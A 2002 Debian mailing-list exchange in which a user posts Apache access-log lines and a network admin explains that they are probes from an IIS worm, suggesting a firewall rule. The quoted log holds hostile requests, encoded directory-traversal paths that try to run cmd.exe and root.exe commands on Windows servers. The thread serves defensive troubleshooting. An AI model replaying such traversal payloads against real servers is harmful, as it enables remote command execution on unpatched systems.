RE: Cracked cracker?
It's actually a sign that there's an IIS worm on that machine. It's not
a person, it's a virus, attempting to propagate to your machine. Since
you run Apache, you're safe from the virus, but not from the attempts.
*sigh*
The most common solution I've heard is to set up an ipchains firewall
rule that prevents that machine from hitting their Apache installations.
dave
{
David W. Harks
CougarNet Network Ops Admin
harksdw@curf.edu
(708) 209-3577
}
-----Original Message-----
From: Michael Olds [mailto:MikeOlds@pacbell.net]
Sent: Thursday, December 12, 2002 9:56 AM
To: Debian-User
Subject: Cracked cracker?
This is a small sample from my access log. Can someone explain to me why
this person would repeatedly attempt access to my computer using the
same IP and the same requests over and over? This isn't to the point of
being a DOS attack; can't they see I don't have any of these things that
they think will enable them to crack my machine? Or is there something
else going on here?
63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-" 63.205.213.16 - -
[11/Dec/2002:13:16:07 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
268 "-" "-" 63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-" 63.205.213.16
- - [11/Dec/2002:13:16:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 278 "-" "-" 63.205.213.16 - - [11/Dec/2002:13:16:08 -0800]
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
"-" "-" 63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 309 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 309 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-"
"-" 63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
"-" "-" 63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-"
"-"
--
To UNSUBSCRIBE, email to debian-user-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
Reply to: